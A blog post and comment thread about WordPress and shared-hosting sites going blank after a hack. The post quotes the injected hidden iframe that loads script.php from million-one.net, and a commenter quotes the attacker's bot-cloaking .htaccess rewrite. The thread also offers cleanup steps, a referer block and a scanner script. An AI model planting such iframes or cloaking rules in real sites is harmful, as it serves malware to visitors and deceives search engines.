Did you go to your WordPress blog and find a blank page instead? I had the same thing happen to me today and I was horrified!
What do you do when you get a blank page on WordPress?
Firstly I checked that I could log in to the WordPress backend. I could and I looked around but couldn’t find anything wrong there.
Next, I logged onto the root of my domain but I couldn’t see anything suspicious there either.
Then I searched Google. Some of the results suggested updating to the latest version of WordPress (mine already was) and that I disable all the plugins as this was the most likely culprit.
I renamed the plugin directory and refreshed the page. Still not working!
I had noticed before that there were two index files on the server so I downloaded them both: index.php and index.html. Also the .htaccess file.
The .htaccess file looked ok but when I opened the index.php and index.html files, I found a line of code that was identical in both that looked very suspicious. It was the following:
<iframe name="StatPage" src="http://million-one.net/script.php" width=5 height=5 style="display:none"></iframe><iframe name="StatPage" src="http://million-one.net/script.php" width=5 height=5 style="display:none"></iframe>
I was not familiar at all with the domain in the code. I deleted the above code from the index.php file.
The index.html file contained only the above code and nothing else so I deleted the index.html file altogether.
After making those changes I was able to see my WordPress blog again. Oh, the joy!
I don’t think that WordPress creates an index.html file at all, so if you ever see one on your site, check it out and delete it.
Have you found another reason why you got a blank page on WordPress? Let us know by posting a comment below.
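The manual check described in this post (open index.php and index.html, look for a hidden iframe pointing at an unfamiliar host, and treat an index.html that contains nothing else as planted) can be run across a whole web root. This is an added example, not code from the original post; the function names and the placeholder host tracker.example.invalid are assumptions, and the script only reports, it deletes nothing.

```python
import os
import re
import tempfile

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>\s*</iframe>", re.I)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?(https?://[^\s"'>]+)""", re.I)
# Hidden by CSS, or squeezed to a few pixels (width=5 height=5 in the post).
HIDDEN_RE = re.compile(r"""display\s*:\s*none|visibility\s*:\s*hidden|"""
                       r"""\b(?:width|height)\s*=\s*["']?\d{1,2}(?![\d%])""", re.I)
# Constructed sample; the host is a placeholder, not the domain from the post.
INJECTED = ('<iframe name="StatPage" src="http://tracker.example.invalid/script.php"'
            ' width=5 height=5 style="display:none"></iframe>')

def remote_src(attrs):
    """Return the remote URL if these iframe attributes describe a hidden frame."""
    src = SRC_RE.search(attrs)
    return src.group(1) if src and HIDDEN_RE.search(attrs) else None

def hidden_iframes(text):
    """URLs of every hidden remote iframe in text."""
    return [u for u in (remote_src(m.group(1)) for m in IFRAME_RE.finditer(text)) if u]

def strip_hidden_iframes(text):
    """Remove only the hidden remote iframes; visible embeds are left alone."""
    return IFRAME_RE.sub(lambda m: "" if remote_src(m.group(1)) else m.group(0), text)

def scan_docroot(root):
    """Report (relative path, urls, planted) for each affected index file."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if name.lower() not in ("index.php", "index.html", "index.htm"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            urls = hidden_iframes(text)
            if urls:
                # Nothing left once stripped: the whole file was planted.
                planted = not strip_hidden_iframes(text).strip()
                findings.append((os.path.relpath(path, root), urls, planted))
    return findings

def demo():
    samples = {"index.php": "<?php require('./wp-blog-header.php'); ?>\n" + INJECTED,
               "index.html": INJECTED * 2}
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples.items():
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_docroot(root)

if __name__ == "__main__":
    print(demo())
```

Pointing scan_docroot at the parent directory of every hosted domain covers the shared-hosting case, where each site's index files need the same check.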
You just saved me a lot of time and stress. Thanks so much! Have you been able to find the cause of this?
Glad to hear that it helped!
No, I don’t know how it happened but it did affect all my domains. I assume that because I had the same password for all my domains that once it cracked one password it was able to infect all of them.
I’ve changed my password so I don’t think it will happen again… for a while at least!
Hi Stocks,
Which webpage are you referring to? I went to your site but it is up and running okay.
After writing this post, my blog was affected again. After deleting the rogue index.html and index.php files, I changed the domain password on my webhost. Since then I haven’t had the same problem.
I think this issue is caused by a hack. Changing your domain’s web host password on a regular basis helps to avoid these kinds of things happening.
Just had a client run into this issue. I dumped the index.html file, and bingo it works.
The client talked to the host and here was their response.
A possible security hole in WP 2.8.5? Or a plugin?
Hey, you did not solve the issue yet. This is a temporary solution.
Check this page’s source code – View Source.
At the very bottom of the code, the code below still exists.
I’m still finding a solution. It’s a WordPress bug eh?
This was very timely information thanks for sharing!
This happened to every blog on my hosting account. I deleted the html file and it fixed the problem, if it comes back I will take the extra step of changing password.
Thanks!
I’m at a loss here. My domain has the same URL when you look at the source code but when I go to my http://FTP…and look at the index.php, that iframe code is nowhere to be found.
Also, I don’t have an index.html file anywhere there.
Weird.
oops…don’t know how the ftp link got in my last comment.
Just for the record, these were two responses earlier today from Kiosk support, received before the latest attack
“We apologize the inconvenience caused to you. The sites should be up soon. We have found the source of the attack and blocked it. More security features are added to the servers to prevent this happening again. Please feel free to re open this ticket if you need any further assistance.”
and this one after that –
“We are aware of these issues and we are upgrading server security, it is a time consuming process but we assure you that everything will be fixed/secured considering the recent attacks.”
Whatever they upgraded, didn’t work that’s for sure
I had the same issue yesterday. But in addition to my two blogs every single site that I had on my server was infected. It seems that once the hacker got access via the wp blog they were able to infect the index files of every domain and sub domain on the server.
So if you are on a shared server that was infected you need to check all of your sites.
I spent many hours fixing the problem yesterday. I had to manually go thru every single domain and subdomain I own. What a pain.
I woke up today and checked my sites and they were ALL re-infected once again.
Only took me 4 hours to manually fix them all again.
Hopefully today’s new wordpress update will stop this insanity.
So if you are running wordpress make sure that you update your blog right now with wordpress’s new update that they announced today.
Otherwise you will get re-infected.
And if you are on a shared server… better pray that everyone who is on your server updates their blog.
I also forgot to mention that my virus protection said that the script that the iframe was sending us to was a virus.
I had same problems on my blogs.
The darn file would come back every day after erasing it. So today I put this blocking access code in my htaccess. It will block the site and give this bastard an error code (403).
You can just copy and paste it as is if you want, I already put his friggin url in it.
RewriteEngine on
# Options +FollowSymlinks
# Return 403 Forbidden when the Referer header contains million-one.net
RewriteCond %{HTTP_REFERER} million-one\.net [NC]
RewriteRule .* - [F]
Paul
It seems rather strange that this issue only seems to be affecting Kiosk/GVO hosting.
I had this issue with all my domains hosted on Kiosk yesterday and just again today. The strange thing is that it is affecting all domains (I have 17 on Kiosk) whether they are WordPress or not.
I am convinced that the problem does not lie with WordPress at all but rather a gaping security hole with Kiosk allowing access to WHM.
After yesterday’s attack, I changed all my passwords for WHM and cpanel FTP, SQL etc. However, still these hackers are able to get in. The reason being that if you log in to your WHM through the Kiosk site members login route, you can only do so using the original password that you had when you signed up. Once logged in, you have free access to all cpanels on your hosting account – no passwords required!
I have already pointed this out to Kiosk support but it seems that Joel is being told that WordPress is to blame! If that were the case, how come normal html (xsitepro) sites are also being attacked as well.
ahhh, nevermind. There WAS an index.html file in there. I guess I didn’t see it. Once I deleted it. My blog was visible again.
I notice that some folks here are just deleting the rogue index.html file. However, you also need to go into index.php and delete the iframe section there as well. index.html is not used on WordPress but index.php is. If the site is html, then the opposite applies.
That million-one.net domain is probably just a zombie site that carries the malware or virus or whatever the end game is. I doubt if they are the actual hackers who are doing the attacking.
@HBB Advisor
I am more convinced than ever that this issue is down to Kiosk and not WordPress. I have two domains that are just sitting on Kiosk servers but are not actually used for anything. The only way they could be found is by looking at the listing in my Webhost Manager. However, they are being hit with this iframe.
On the other hand, a couple of my domains have several separate wordpress installs in sub directories under the main domain and yet they are not being touched – why – because they are not listed in WHM.
I have just written to Joel and Kiosk support yet again but whether they will do anything about it is anybody’s guess. Either Joel is being misinformed or they are trying to cover up the real problem by blaming WordPress.
As far as I see it, there is a gaping security hole that is allowing easy access to WHM and domain cpanels. I experienced a similar issue back in September but all that did was throw up errors on the bottom of WordPress sites. That one though was injecting a line of code into index.php like get_cyclik_links_rand()
I must be a glutton for punishment as well considering the hassle I have had with Kiosk hosting more or less since the day I signed up. Time to look around for another host me thinks!
I have been battling this pain in the neck for the past 2 weeks. I tried permissions, deletion, .htaccess modifications etc all to no avail.
The boyz at kiosk/gvo have actually been SUPER RESPONSIVE! I’ve been with various hosts since 1995 and NONE have been so responsive.
Now, if it is not a wordpress problem, then why would wordpress put out a new upgrade TODAY? I believe it is a combination wordpress AND kiosk problem.
So I upgraded all of my blogs except for 2 to 2.8.6. Why not the other 2? Well, right now, trying to get into fantastico is problematic and has been for the past 4 hours or so.
It appears they are still trying to clean up the mess. YAYYY!! and Here is what we get:
“Parse error: syntax error, unexpected ‘;’ in /tmp/cpanel_phpengine.1258165436.252786b4v62QmRG on line 116” which means cpanel has to be reinstalled, or fantastico has to be reinstalled but what i am finding when trying to upgrade wordpress manually is that they have put a lockdown on security by shutting down access to shell.
Whatever… I hope they get us hooked up soon. million-one.net and the porn thingy at tradbox.net is getting on my last nerve. Well i use firefox with noscript so they don’t run on my computer but my visitors are getting hit big time.
Guess what, folks?! This too shall pass and hope the boys learn a lesson and shut down some of the holes in their security.
I had these guys run a report on a coupla of my domains on a shared server and here is what is reported. I haven’t analyzed it but I believe the kiosk boyz are on it!
God Bless
Faith Sloan
http://www.faithsloan.com
@Faith Sloan
The wordpress security upgrade is not specific to Kiosk despite the claims being made in a certain video/email. However, the issue is only affecting folks hosted on Kiosk.
I would hazard a guess that somebody has got hold of a list of Kiosk member passwords and using them to autologin to WHM/Cpanels.
We need a way to change member login names and passwords but there is no means of doing that, or at least not that I can see.
My client is on http://www.wwkiosk.com/, has had his 5 blogs affected. Dump the index.html and clean out the index.php, that is what they told us and I did. Now, I have my own server, with 25-30 accts on it, no problems. It’s wwkiosk for sure.
Tell me about it, I had 50 xsitepros sites and 21 blogs to clean up on kiosk every day for this last week.
Last year I had my lesson when all my sites were down and Google dropped my rankings. Now I have a bunch of sites on other servers so it’s only a part of my business that suffered this week with kiosk… Spread the love.
@Alan K I have the exact same concerns. Every one of my sites were affected. Not just my two WP blogs. And like you every one of them are hosted with Kiosk/GVO. In fact this is the second time this year that they have had a major hacking issue. The last one cost me a bunch of google page one results that I had to rebuild.
I just spoke with someone I know that has a WP blog with another hosting company and has not had any problems. And her blog is an older install that has not been updated.
Problem is Kiosk/GVO will never admit that it is their fault.
@Faith
I already changed the WHM and Cpanel passwords after the first attack but doing so did not prevent another attack yesterday evening. The only password which I did not and could not change was the member login password.
Having said that, I have found a way to change that password although not the user name.
Login into your member area as usual, go to “account manager” and then “edit your profile”. There is an option in there that allows a password change. You can only use letters or numbers but at least you can change it.
also guys, this is not specific to kiosk/gvo. i experienced this back in year 2000 through 2009 with different hosts. it is not difficult to do this little injection. but yes, kiosk/gvo can take steps to prevent it but we must be cognizant and do the same.
now ask yourself this. Why did wordpress come out with 2.8.6 upgrade today when kiosk/gvo lock elbows with them, collaborated and came up with a solution? this is unheard of in the industry! wordpress stepped up to the plate and got ‘er done. but kiosk/gvo need to do the do and get ‘er done on their end. my previous post showed their vulnerabilities.
Why shucks! I’ve been using kiosk since forever and my email address at frsa.com has been spoofed galore! i receive thousands of undeliverable email messages every day. I never use that domain for email. besides it is blacklisted because they allow the invalid sender to send out email as if it is coming from my domain. it ain’t a difficult fix. but still after all of these years my lovely frsa.com domain is basically burnt toast.
God Bless
Faith Sloan
God Bless
Faith
The issue is NOT just affecting kiosk customers. I repeat. This is NOT just affecting kiosk customers today nor yesterday.
God Bless
Faith
http://www.faithsloan.com
Oh, yeah. When you log into your WHM , you click on list accounts.
Then all of your domain accounts (users) are listed.
Click on the ‘+’ sign on the left of the domain name.
You will see a place to change the password and contact email for each domain
God Bless
Faith Sloan
If you haven’t seen Joel’s (founder of GVO) video explaining the nature of these attacks, please watch it here: http://storage.joeltherien.com/wordpress/
@Paul
Exactly the same here – Every domain and sub domain listed on the WHM is being hit whether it is in use or not, xsitepro or WP. One strange thing is that whatever/whoever is doing it does not seem to work on weekends. Saturday and Sunday no problems but then got hit last night and tonight (UK time) and both at the same time – 15.38 Texas time.
One of my domains has several separate wordpress installs in sub directories and none of them are getting touched – only the root domain.
Well I disagree with them.
My regular websites were attacked as well, so its not a blog only related problem. And I did update one blog to the latest version to see and it got attacked the same as my older version today nov17 2009. sooooo…
Yeah, this is getting too old. Every day I have to clean hosted files for multiple domains. It ain’t difficult but i’d rather be whistling dixie.
I have to quickly squash this problem or Google will penalize me; folks won’t come back to my sites, etc.
And no. It is not a wordpress ONLY problem. It was caused by a breach. Now that the breach hole is still open and obviously is timed to execute every morning at the exact same time, why the heck can’t we kill this bugger?
It MAY have started with a WordPress breach but the problem goes past that. Kiosk, needs to fix this thing for good so this ‘problem’ won’t continue to affect them/us.
It looks like the cron job looks for index.php. If you got index.php, then they put that nasty million-one.net iframe at the bottom. If you do not have index.html, it creates one with that nasty iframe in it.
2 weeks ago i found that my .htaccess file at the root level was compromised. they changed this:
RewriteEngine On
RewriteCond %{HTTP_HOST} !^www\. [NC]
RewriteRule ^(.*)$ http://www.%{HTTP_HOST}/$1 [R=301,L]
to this:
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^.*(bot|urp|msn).* [NC]
RewriteRule ^(.*) 2.html [NS,NC,L]
Jerks!
LOL!
God Bless
Faith
Yes, only the root directory.
Funny but not really …
As soon as I finished with my above post, my domains were hosed again. So now it is happening early morning around 9am CST or so and now about 5:30pm CST or so.
Took me 5 minutes to fix the whole package deal. Got those cleanup scripts running. What I probably do is simply run the scripts every 15 minutes. Whateverrrr…
Maybe the clown has a job. He is not allowed out of his hole on the weekends or after 5:30pm CST. Maybe he hasn’t learned how to schedule cron jobs.
God Help Him/Her.
God Bless
Faith
From what I understand, this issue is due to a vulnerability in WordPress. Even so, if your WordPress blog is hosted on a shared server, it will affect all the other domains on the shared server.
To resolve the issue you need to update all your WordPress blogs to the latest version (which at the time of writing is 2.8.6).
wow – nobody can see they were hacked?
That’s right Fred. Unless you know where to look, you wouldn’t think you were hacked if a blank page came up on your WordPress blog. Your first reaction might be that there was an issue with your web hosting or WordPress itself.
Blogging is one popular thing among Internet users. I am a blogger and I have maintained different blogsites. I have a WordPress blog and I have also experienced the same. I think this is because of incompatible plugins, the theme files are not uploaded or incomplete upload of WordPress files.
Thanks for the advice!
You’re welcome Donald!
Great info, thanks